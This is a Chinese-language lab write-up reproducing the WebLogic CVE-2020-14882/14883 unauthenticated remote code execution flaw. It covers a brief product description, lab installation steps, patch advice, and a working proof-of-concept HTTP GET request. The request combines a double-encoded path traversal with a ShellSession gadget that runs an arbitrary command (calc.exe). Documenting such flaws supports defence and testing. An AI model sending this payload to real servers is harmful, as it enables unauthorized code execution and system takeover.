CVE-2020-14882 weblogic 未授權命令執行復現

0x01WebLogic簡介

WebLogic是美國Oracle公司出品的一個application server，確切的說是一個基於JAVAEE架構的中間件，WebLogic是用於開發、集成、部署和管理大型分布式Web應用、網絡應用和數據庫應用的Java應用服務器。將Java的動態功能和Java Enterprise標准的安全性引入大型網絡應用的開發、集成、部署和管理之中。

WebLogic是美商Oracle的主要產品之一，是並購BEA得來。是商業市場上主要的Java（J2EE）應用服務器軟件（application server）之一，是世界上第一個成功商業化的J2EE應用服務器, 已推出到12c(12.2.1.4) 版。而此產品也延伸出WebLogic Portal，WebLogic Integration等企業用的中間件（但當下Oracle主要以Fusion Middleware融合中間件來取代這些WebLogic Server之外的企業包），以及OEPE(Oracle Enterprise Pack for Eclipse)開發工具。

0x02漏洞簡介

未經身份驗證的遠程攻擊者可能通過構造特殊的 HTTP GET請求，利用該漏洞在受影響的 WebLogic Server 上執行任意代碼。它們均存在於WebLogic的Console控制台組件中。此組件為WebLogic全版本默認自帶組件，且該漏洞通過HTTP協議進行利用。將CVE-2020-14882和CVE-2020-14883進行組合利用后，遠程且未經授權的攻擊者可以直接在服務端執行任意代碼，獲取系統權限。

0x03靶機環境

Win7 x64

java版本1.8.0_181

weblogic版本 12.2.1.4

 

0x04漏洞環境搭建：

1. 復現環境下載：

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

 

 

 

2.以管理員運行cmd，cd到安裝包目錄，輸入java -jar fmw_12.2.1.4.0_wls_lite_generic.jar啟動安裝

 

 

 

3. 默認下一步，這里選擇含示例的完整安裝包

 

 

 

 

 

 

 

 

 

 

4. 訪問http://127.0.0.1:7001/console

出現如下登錄頁面即安裝成功

 

 

 

0x05漏洞復現：

通過非法字符繞過訪問，然后通過Gadget調用命令執行，poc如下

 

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1
​Host: 192.168.1.111:7001

 

 

 

1.URL直接請求或者burp抓包使用都可

 

 

 

 

 

 

 

2. 關於whoami等命令無法回顯的問題，我這里向樂神請教的poc，已解決

 

 

 

 

0x06修復建議

下載最新補丁

Oracle官方補丁需要用戶持有正版軟件的許可賬號，使用該賬號登陸https://support.oracle.com后，可以下載最新補丁。

 

關注公眾號支持一波